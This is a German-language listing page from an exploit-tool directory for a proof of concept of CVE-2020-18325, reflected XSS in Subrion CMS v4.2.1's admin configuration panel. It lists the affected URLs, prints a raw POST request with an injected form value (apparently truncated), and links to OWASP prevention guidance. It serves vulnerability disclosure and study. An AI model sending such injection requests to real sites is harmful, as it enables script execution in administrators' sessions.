Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-18325 — Proof-of-Concept-Exploit für reflektierte XSS-Schwachstellen im Konfigurationspanel von Subrion CMS v4.2.1, der JavaScript-Injection über POST-Anfragen demonstriert. | Kitploit
Tools/GitHubGitHub/hamm0nz/cve-2020-18325
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

Proof-of-Concept-Exploit für reflektierte XSS-Schwachstellen im Konfigurationspanel von Subrion CMS v4.2.1, der JavaScript-Injection über POST-Anfragen demonstriert.

Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Mehrere Cross-Site-Scripting (XSS)-Sicherheitslücken im Konfigurationsbereich von Intelliants Subrion CMS v4.2.1

Beschreibung

Subrion CMS ist einfach zu installieren und unkompliziert zu verwalten. Verwenden Sie es als eigenständige Anwendung oder in Verbindung mit anderen Anwendungen, um Einsteiger-Seiten, mittelgroße oder große Websites zu erstellen.

Im Konfigurationsbereich von Subrion CMS v4.2.1 wurden mehrere Reflected Cross-Site-Scripting-Sicherheitslücken entdeckt, die es einem entfernten Angreifer ermöglichen, beliebiges JavaScript einzuschleusen.

Datum: 27-02-2022
Software-Link: https://subrion.org
Exploit-Autor: HaMM0nz
CVE: CVE-2020-18325
Kategorie: Webanwendung
Betroffene URLs

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

Proof of Concept

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/ Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623 Content-Length: 5605 Connection: close Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded Upgrade-Insecure-Requests: 1






-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

Zeitleiste

Entdeckung und Meldung: 24. Juni 2019
CVE-ID wurde vergeben: 11. August 2021
Veröffentlichung: 27. Februar 2022

Lösung

Ziehen Sie in Betracht, die OWASP-Richtlinien zur XSS-Prävention zu befolgen. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

Tool herunterladen